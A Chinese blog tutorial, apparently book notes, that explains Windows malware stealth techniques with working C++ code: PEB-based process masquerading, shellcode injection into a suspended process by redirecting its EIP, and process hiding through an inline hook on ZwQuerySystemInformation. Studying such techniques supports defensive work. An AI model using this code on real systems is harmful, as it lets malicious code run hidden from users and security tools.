windows黑客编程技术之隐藏技术(进程伪装,傀儡进程,进程隐藏)

最新推荐文章于 2024-09-22 22:30:48 发布
最新推荐文章于 2024-09-22 22:30:48 发布
阅读量6.6k 收藏 43
点赞数 2
文章标签: windows c++
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_44891742/article/details/125627482
版权

进程伪装:通过修改指定进程PEB中的路径和命令行信息实现伪装。
傀儡进程:通过进程挂起,替换内存数据再恢复执行,从而实现创建“傀儡进程”。
进程隐藏:通过HOOK函数ZwQuerySystemInfomation来实现进程隐藏。

1 进程伪装

实现原理

就是修改指定进程环境块中的进程路径ImagePathName以及命令行CommandLine信息,从而达到进程伪装的效果。所以,实现的关键在于进程环境块的获取。可以用ntdll.dll的导出函数NTQueryInfomationProcess来获取指定进程的PEB地址,然后调用ReadProcessMemory和WriteProcessMemory来读写目标进程。

编码实现

关键字:NtQueryInformationProcess,Read/WriteProcessMemory,PROCESS_BASIC_INFORMATION,PEB

// 修改指定进程的进程环境块PEB中的路径和命令行信息, 实现进程伪装
BOOL DisguiseProcess(DWORD dwProcessId, wchar_t *lpwszPath, wchar_t *lpwszCmd)
{
	// 打开进程获取句柄
	HANDLE hProcess = ::OpenProcess(PROCESS_ALL_ACCESS, FALSE, dwProcessId);
	if (NULL == hProcess)
	{
		ShowError("OpenProcess");
		return FALSE;
	}

	typedef_NtQueryInformationProcess NtQueryInformationProcess = NULL;
	PROCESS_BASIC_INFORMATION pbi = { 0 };
	PEB peb = { 0 };
	RTL_USER_PROCESS_PARAMETERS Param = { 0 };
	USHORT usCmdLen = 0;
	USHORT usPathLen = 0;
	// 需要通过 LoadLibrary、GetProcessAddress 从 ntdll.dll 中获取地址
	NtQueryInformationProcess = (typedef_NtQueryInformationProcess)::GetProcAddress(
		::LoadLibrary("ntdll.dll"), "NtQueryInformationProcess");
	if (NULL == NtQueryInformationProcess)
	{
		ShowError("GetProcAddress");
		return FALSE;
	}
	// 获取指定进程的基本信息
	NTSTATUS status = NtQueryInformationProcess(hProcess, ProcessBasicInformation, &pbi, sizeof(pbi), NULL);
	if (!NT_SUCCESS(status))
	{
		ShowError("NtQueryInformationProcess");
		return FALSE;
	}

	/*
  	    注意在读写其他进程的时候,注意要使用ReadProcessMemory/WriteProcessMemory进行操作,
	    每个指针指向的内容都需要获取,因为指针只能指向本进程的地址空间,必须要读取到本进程空间。
	    要不然一直提示位置访问错误!
	*/
	// 获取指定进程进本信息结构中的PebBaseAddress
	::ReadProcessMemory(hProcess, pbi.PebBaseAddress, &peb, sizeof(peb), NULL);
	// 获取指定进程环境块结构中的ProcessParameters, 注意指针指向的是指定进程空间中
	::ReadProcessMemory(hProcess, peb.ProcessParameters, &Param, sizeof(Param), NULL);

	// 修改指定进程环境块PEB中命令行信息, 注意指针指向的是指定进程空间中
	usCmdLen = 2 + 2 * ::wcslen(lpwszCmd);
	::WriteProcessMemory(hProcess, Param.CommandLine.Buffer, lpwszCmd, usCmdLen, NULL);
	::WriteProcessMemory(hProcess, &Param.CommandLine.Length, &usCmdLen, sizeof(usCmdLen), NULL);
	// 修改指定进程环境块PEB中路径信息, 注意指针指向的是指定进程空间中
	usPathLen = 2 + 2 * ::wcslen(lpwszPath);
	::WriteProcessMemory(hProcess, Param.ImagePathName.Buffer, lpwszPath, usPathLen, NULL);
	::WriteProcessMemory(hProcess, &Param.ImagePathName.Length, &usPathLen, sizeof(usPathLen), NULL);

	return TRUE;
}

测试

修改前
在这里插入图片描述
修改后
在这里插入图片描述

傀儡进程

实现原理

傀儡进程的创建原理就是修改某一进程的内存数据,向内存中写入Shellcode代码,并修改该进程的执行流程,使其转而执行Shellcode代码。
关键点有二:
一是写入ShellCode数据的时机,二是更改执行流程的方法。当我们CreateProcess的时候,设置状态为CREATE_SUSPENDED,这样主线程会挂起,直到通过ResumeThread来回复线程方可继续执行。在这个时候我们可以通过SetThreadContext函数修改线程上下文中的EIP数据,改变程序运行顺序。

编码实现

关键字:Get/SetThreadContext,ResumeThread

// 创建进程并替换进程内存数据, 更改执行顺序
BOOL ReplaceProcess(char *pszFilePath, PVOID pReplaceData, DWORD dwReplaceDataSize, DWORD dwRunOffset)
{
	STARTUPINFO si = { 0 };
	PROCESS_INFORMATION pi = { 0 };
	CONTEXT threadContext = { 0 };
	BOOL bRet = FALSE;
	::RtlZeroMemory(&si, sizeof(si));
	::RtlZeroMemory(&pi, sizeof(pi));
	::RtlZeroMemory(&threadContext, sizeof(threadContext));
	si.cb = sizeof(si);
	// 创建进程并挂起主线程
	bRet = ::CreateProcess(pszFilePath, NULL, NULL, NULL, FALSE, CREATE_SUSPENDED, NULL, NULL, &si, &pi);
	if (FALSE == bRet)
	{
		ShowError("CreateProcess");
		return FALSE;
	}
	// 读取基址的方法: 此时context中的EBX是指向PEB的指针, 而在PEB偏移是8的位置存放 PEB_LDR_DATA 的地址
	// 我们可以根据 PEB_LDR_DATA 获取进程基址以及遍历进程链获取所有进程
//	DWORD dwProcessBaseAddr = 0;
//	::ReadProcessMemory(pi.hProcess, (LPVOID)(8 + threadContext.Ebx), &dwProcessBaseAddr, sizeof(dwProcessBaseAddr), NULL);

	// 在替换的进程中申请一块内存
	LPVOID lpDestBaseAddr = ::VirtualAllocEx(pi.hProcess, NULL, dwReplaceDataSize, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
	if (NULL == lpDestBaseAddr)
	{
		ShowError("VirtualAllocEx");
		return FALSE;
	}
	// 写入替换的数据
	bRet = ::WriteProcessMemory(pi.hProcess, lpDestBaseAddr, pReplaceData, dwReplaceDataSize, NULL);
	if (FALSE == bRet)
	{
		ShowError("WriteProcessError");
		return FALSE;
	}
	// 获取线程上下文
	// 注意此处标志,一定要写!!!
	threadContext.ContextFlags = CONTEXT_FULL;
	bRet = ::GetThreadContext(pi.hThread, &threadContext);//64:Wow64GetThreadContext
	if (FALSE == bRet)
	{
		ShowError("GetThreadContext");
		return FALSE;
	}
	// 修改进程的PE文件的入口地址以及映像大小,先获取原来进程PE结构的加载基址
	threadContext.Eip = (DWORD)lpDestBaseAddr + dwRunOffset;
	// 设置挂起进程的线程上下文
	bRet = ::SetThreadContext(pi.hThread, &threadContext);//Wow64SetThreadContext
	if (FALSE == bRet)
	{
		ShowError("SetThreadContext");
		return FALSE;
	}
	// 恢复挂起的进程的线程
	::ResumeThread(pi.hThread);

	return TRUE;
}

测试

直接启动测试程序弹框:
在这里插入图片描述
用傀儡进程的形式启动,成功执行了shellcode代码。
在这里插入图片描述

进程隐藏

实现原理

通过HOOK WIN32API ZwQuerySystemInfomation来实现进程隐藏。遍历进程通常是通过CreateToolhelp32Snapshot等来实现的,通过逆向这些API可以发现,他们内部最终是通过调用ZwQuerySystemInfomation,所以只需要HOOKZwQuerySystemInfomation就行了。
在钩子函数中判断检索的信息是否是该进程信息,是则去掉,进而隐藏进程信息。
但是注意这个函数没导出,还是要手动去ntdll里面去获取。

INLINE HOOK技术介绍:
Inline hook的核心原理是在获取进程中指定API的地址后,修改该API函数入口地址的前几个字节数据,写入一个跳转指令,跳转到自定义的钩子函数执行。
注意区分32和64位系统,他们的指针长度是不一样的。所以32位系统需要更改函数前五字节数据,64位则是前12字节数据。

编码实现

void HookApi()
{
	// 获取 ntdll.dll 的加载基址, 若没有则返回
	HMODULE hDll = ::GetModuleHandle("ntdll.dll");
	if (NULL == hDll)
	{
		return;
	}
	// 获取 ZwQuerySystemInformation 函数地址
	typedef_ZwQuerySystemInformation ZwQuerySystemInformation = (typedef_ZwQuerySystemInformation)::GetProcAddress(hDll, "ZwQuerySystemInformation");
	if (NULL == ZwQuerySystemInformation)
	{
		return;
	}
	// 32 位下修改前 5 字节, 64 位下修改前 12 字节
#ifndef _WIN64
	// jmp New_ZwQuerySystemInformation
	// 机器码位:e9 _dwOffset(跳转偏移)
	//		addr1 --> jmp _dwNewAddress指令的下一条指令的地址,即eip的值
	//		addr2 --> 跳转地址的值,即_dwNewAddress的值
	//		跳转偏移 _dwOffset = addr2 - addr1
	BYTE pData[5] = { 0xe9, 0, 0, 0, 0};
	DWORD dwOffset = (DWORD)New_ZwQuerySystemInformation - (DWORD)ZwQuerySystemInformation - 5;
	::RtlCopyMemory(&pData[1], &dwOffset, sizeof(dwOffset));
	// 保存前 5 字节数据
	::RtlCopyMemory(g_OldData32, ZwQuerySystemInformation, sizeof(pData));
#else
	// mov rax,0x1122334455667788
	// jmp rax
	// 机器码是:
	//	48 b8 8877665544332211
	//	ff e0
	BYTE pData[12] = {0x48, 0xb8, 0, 0, 0, 0, 0, 0, 0, 0, 0xff, 0xe0};
	ULONGLONG ullOffset = (ULONGLONG)New_ZwQuerySystemInformation;
	::RtlCopyMemory(&pData[2], &ullOffset, sizeof(ullOffset));
	// 保存前 12 字节数据
	::RtlCopyMemory(g_OldData64, ZwQuerySystemInformation, sizeof(pData));
#endif
	// 设置页面的保护属性为 可读、可写、可执行
	DWORD dwOldProtect = 0;
	::VirtualProtect(ZwQuerySystemInformation, sizeof(pData), PAGE_EXECUTE_READWRITE, &dwOldProtect);
	// 修改
	::RtlCopyMemory(ZwQuerySystemInformation, pData, sizeof(pData));
	// 还原页面保护属性
	::VirtualProtect(ZwQuerySystemInformation, sizeof(pData), dwOldProtect, &dwOldProtect);

}
shalunZhou
关注
windows进程隐藏工具
09-08
进程隐藏工具是简单小巧的软件,可以隐藏任务栏、进程,一键隐藏你想隐藏的程序。如果你上班、上课期间偷偷看电影、玩游戏又害怕被发现,可以下载一款进程隐藏工具,一键就能隐藏你开着的进程
WIN下 修改,伪装进程路径。支持XP,WIN7 WIN764
01-07
WIN下 修改,伪装进程路径。支持XP,WIN7 WIN764
常见的进程隐藏方法
最新发布
m0_57836225的博客
09-22 625
名称混淆:无论是在 Windows 还是 Linux 系统下,都可以将进程的名称设置得与系统正常进程或常用软件进程的名称相似,或者频繁改变进程名称,以迷惑管理员和安全软件。例如,将恶意进程的名称改为与系统服务进程类似的名称,如“svchost.exe”(Windows 系统中的合法服务进程)的变体,使其在进程列表中难以被快速识别。- 原理:将自身的代码注入到合法的进程地址空间中运行,这样在任务管理器等常规工具中,看到的是被注入的合法进程在运行,而实际上恶意代码也在该进程空间中执行,从而实现了隐藏
隐藏windows进程
04-21
隐藏进程 隐藏进程 隐藏进程 隐藏进程 隐藏进程 隐藏进程 隐藏进程
【渗透测试】初探进程伪装
HBohan的博客
11-03 634
前言 当我们获取到一台主机的权限过后,拿到了自己想要搜集的信息,这时候我们就会留一个后门进行权限维持,权限维持的学问其实很深,今天就主要介绍其中一种比较简单的权限维持的方法 – 进程伪装。 我们知道在windows里面有很多系统进程,如winlogon.exe、explorer.exe、services.exe等等,这些exe都是Windows必须具有的exe,当缺失某些exe的时候,windows就不能够正常运行,所以我们如果想到实现进程伪装,最好的选择就是伪装成系统必备的exe,当我们进行进程伪装之后,
进程伪装实现将进程伪装成任意程序
yeanhoo的博客
09-24 6704
进程伪装 修改指定进程环境块中的进程路径以及命令行信息,从而达到进程 伪装的效果。 获取进程的句柄 内联汇编获取peb 修改命令行和imagepath #include<windows.h> #include<winternl.h> BOOL DisguiseProcess(wchar_t *lpwszPath, wchar_t *lpwszCmd); int main() { wchar_t *lpwszPath = L"c:\\windows\\system32\\c
Windows下的进程隐藏
weixin_30416497的博客
11-08 931
Windows下的进程隐藏 9X环境中Windows提供了想光的API函数用于隐藏系统进程。但是到了2000以上系统,已经无法真正的做到对于进程隐藏,除非编写底层驱动。但是我们可以通过一些变通的办法来达到隐藏进程的目的,其中一个就是远程注入。简单的说就是先编写一个API的DLL,然后将这个DLL库注入到一个系统进程中,作为它的一个线程去执行。...
进程隐藏的各种方法 以及分析比较以及实现链接
weixin_30588729的博客
09-09 312
典型进程隐藏技术1 基于系统服务的进程隐藏技术在 W I N 9X 系列操作系统中, 系统进程列表中不能看到任何系统服务进程, 因此只需要将指定进程注册为系统服务就能够使该进程从系统进程列表中隐形 在win9x下用RegisterServiceProcess函数隐藏进程,NT架构下用不了 即win2000 xp等什么的用不了此方法。 2 基于API HOOK的进程...
网络和黑客windows编程
xzb237cc
01-17 167
网络和黑客windows编程 2011年04月18日   第一节 了解Windows机制Windows 是一个“基于事件的,消息驱动的”操作系统。   在Windows下执行一个程序,只要用户进行了影响窗口的动作(如改变窗口大小或移动、单击鼠标等)该动作就会触发一个相应的“事件” 系统每次检测到一个事件时,就会给程序发送一个“消息”,从而使程序可以处理该事件。   每个Windows 应...
进程伪装详解
星星我啊,已经很努力在学习了, 有人一起学习吗?Ziansec-1
03-10 1748
当我们获取到一台主机的权限过后,拿到了自己想要搜集的信息,这时候我们就会留一个后门进行权限维持,权限维持的学问其实很深,今天就主要介绍其中一种比较简单的权限维持的方法 -- 进程伪装。我们知道在windows里面有很多系统进程,如。
隐藏进程小工具
01-13
隐藏进程,适用于win7,xp.主要用于自己进程不被别程序探测到.
进程隐藏工具(一个可以隐藏进程的小工具)
03-23
一个可以隐藏进程的小工具,使用简单,体积小巧(105KB)
修改、伪装进程路径。支持XP,WIN7 WIN764
03-29
windows下 修改,伪装进程路径。支持XP,WIN7 WIN764
进程隐藏技术
11-15
进程隐藏技术进程隐藏技术
伪装线程进程
08-08
可以伪装现成进程
[网络安全自学篇] 八十四.《Windows黑客编程技术详解》之VS环境配置、基础知识及DLL延迟加载详解(1)
热门推荐
杨秀璋的专栏
06-19 1万+
从这篇文章开始,作者将带着大家来学习《Windows黑客编程技术详解》,其作者是甘迪文老师,推荐大家购买来学习。作者将采用实际编程和图文结合的方式进行分享,并且会进一步补充知识点。第一篇文章主要包括两部分内容,开发环境(VS、编译设置)、基础技术、运行单一实例(互斥对象示例)、DLL延迟加载(skin++换皮肤示例)、资源释放(MFC示例)。希望对您有所帮助~
进程隐藏技术系列之简介
weixin_43742894的博客
04-27 1981
什么是进程隐藏? 对 Windows系统可以用自带的任务管理器,查看进程列表, 找出可疑进程。 恶意代码为了保护自己的进程不被发现,所以就有了进程隐藏技术,用来对抗进程检测。 为什么需要进程隐藏进程隐藏是病毒和木马确保自己不被查杀所要做的最重要的事,而分析检测隐藏进程和发现木马病毒是反病毒工作者的一个重要任务。 为了对抗病毒检测,病毒开发者也在一直寻找更有效的进程隐藏技术进程隐藏的方法 ...
黑客术语全面积累
a720561252803的博客
05-24 1273
黑帽 为非法目的进行黑客攻击的人,通常是为了经济利益。他们进入安全网络以销毁、赎回、修改或窃取数据,或使网络无法 用于授权用户。这个名字来源于这样一个事实:老式的黑白西部电影中的恶棍很容易被电影观众识别到,因为他们穿着黑 色的斯泰森,而“好人”则戴着白帽子 后门 隐藏在计算机系统中的“管道”,绕过登录和密码的正统保护,从而使它们在保护数据方面基本上无效。 蛮力攻击 黑客对系统中每一个可能的密码进行...
黑客术语
05-19 5770
系统篇肉鸡肉鸡就是具有最高管理权限的远程电脑。简单的说就是受你控制的远程电脑。肉鸡可以是win、Unix/Linux……等各种系统;肉鸡可以是一家公司的服务器,一家网站的服务器,甚至是美国白宫或军方的电脑,只要你有这本事入侵并控制他,要登陆肉鸡,必须知道3个参数:远程电脑的IP、用户名、密码。3389、4899肉鸡3389是Windows终端服务(Terminal Services)所默认使用的端...
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值